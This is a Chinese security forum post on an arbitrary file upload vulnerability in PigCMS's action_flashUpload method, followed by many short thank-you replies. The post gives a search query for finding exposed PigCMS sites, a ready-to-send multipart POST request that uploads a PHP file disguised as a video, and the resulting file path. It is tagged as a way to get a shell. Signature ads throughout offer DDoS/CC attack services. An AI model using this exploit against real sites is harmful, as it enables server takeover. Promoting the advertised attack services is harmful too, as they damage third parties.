登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
1
2
/ 2 页
下一页
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
漏洞分析
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
2026年渗透测试安全工程师工资会涨吗?
批量漏洞挖掘思路
XXL-JOB 越权漏洞分析
【渗透测试】HTB靶场之Baby 全过程wp
从HTML注入到CSRF:一次漏洞组合拳实战
【渗透测试】HTB靶场之Lock 全过程wp
【渗透测试】HTB靶场之WingData 全过程wp
H5渗透实战:从负数金额漏洞到签名绕过
AI时代,渗透测试工作将如何开展?
AI渗透测试工具:从"脚本跑腿"到"Agent大脑"的范式革命
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
2026年渗透测试安全工程师工资会涨吗?
27
553
周濡霈
2026-01-06
业界
批量漏洞挖掘思路
20
721
钦娅芬
2026-01-11
安全
XXL-JOB 越权漏洞分析
21
447
毡轩
2026-01-22
业界
【渗透测试】HTB靶场之Baby 全过程wp
17
294
甘子萱
2026-01-24
安全
从HTML注入到CSRF:一次漏洞组合拳实战
15
65
蝙俚
2026-01-29
业界
【渗透测试】HTB靶场之Lock 全过程wp
1
30
愿隙
2026-02-17
业界
【渗透测试】HTB靶场之WingData 全过程wp
3
138
迁岂罚
2026-02-19
安全
H5渗透实战:从负数金额漏洞到签名绕过
0
94
尝琨
2026-02-26
业界
AI时代,渗透测试工作将如何开展?
0
752
韩素欣
2026-02-26
科技
AI渗透测试工具:从"脚本跑腿"到"Agent大脑"的范式革命
0
473
热琢
2026-03-01
回复
(35)
映各
2025-10-31 03:02:59
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
感谢分享,学习下。
喳谍
2025-11-25 20:37:34
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
荆邦
2025-12-25 16:29:51
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
收藏一下 不知道什么时候能用到
计海龄
2026-1-2 17:59:53
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
用心讨论,共获提升!
驶桐柢
2026-1-4 17:15:38
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
谢谢分享,试用一下
抑卞枯
2026-1-5 16:11:08
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,学习下。
骆贵
2026-1-14 07:55:01
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
新版吗?好像是停更了吧。
轮达
2026-1-15 21:49:11
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
很好很强大 我过来先占个楼 待编辑
党新苗
2026-1-18 08:05:50
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
这个好,看起来很实用
瞿佳悦
2026-1-18 21:11:35
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
谢谢分享,辛苦了
客臂渐
2026-1-18 23:49:04
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
新版吗?好像是停更了吧。
钿稳铆
2026-1-20 14:32:36
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
东西不错很实用谢谢分享
魁睥
2026-1-20 20:54:15
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
谢谢分享,辛苦了
跑两獗
2026-1-21 18:47:28
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,下载保存了,貌似很强大
凤患更
2026-1-22 13:33:13
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢分享,试用一下
劳暄美
2026-1-23 07:50:50
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
辖瑁地
2026-1-23 08:30:44
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
喜欢鼓捣这些软件,现在用得少,谢谢分享!
仰翡邸
2026-1-23 09:29:53
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
分享、互助 让互联网精神温暖你我
笙芝
2026-1-27 18:07:36
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
很好很强大 我过来先占个楼 待编辑
下一页 »
1
2
/ 2 页
下一页
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
anyue1937
2026-1-27 18:07:36
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991125
anyue1937
9994892
kk14977
6845359
4
xiangqian
638210
5
宋子
9888
6
韶又彤
9910
7
闰咄阅
9993
8
刎唇
9995
9
蓬森莉
9873
10
遗憩
10006
查看更多
今日好文热榜
8
用六边形架构与整洁架构对比是伪命题?
126
ClaimsPrincipal序列化为Json的正确姿势
64
【节点】[MetalReflectance节点]原理解析与
69
强化学习算法-2:熵坍缩以及奖励坍缩问题机
251
Linux 一线必备:高能 Shell 脚本,让工作
847
瑞云渲染大赛官网报名入口及参赛指南(参赛
876
又一个新项目完结,我要出海了!
392
一天一个Python库:multidict - 高级字典类
336
FastAPI分布式系统实战:拆解分布式系统中
822
3分钟搞懂深度学习AI:参数量与形状推导:
447
3分钟搞懂深度学习AI:参数量与形状推导:
618
从程序员到架构师:6大编程范式全解析与实
771
LeetCode 407 接雨水 II(3D 版):python3
737
ORACLE如何修改SEUQNCE的当前值
195
【译】Visual Studio 二月更新
997
如何设计一个扛住千万级流量的系统?
287
你写的代码能debug,生命却不能回滚
867
别只知道马蜂窝!这个旅行网站,攻略全、路
993
spring-事务管理
673
旅游猫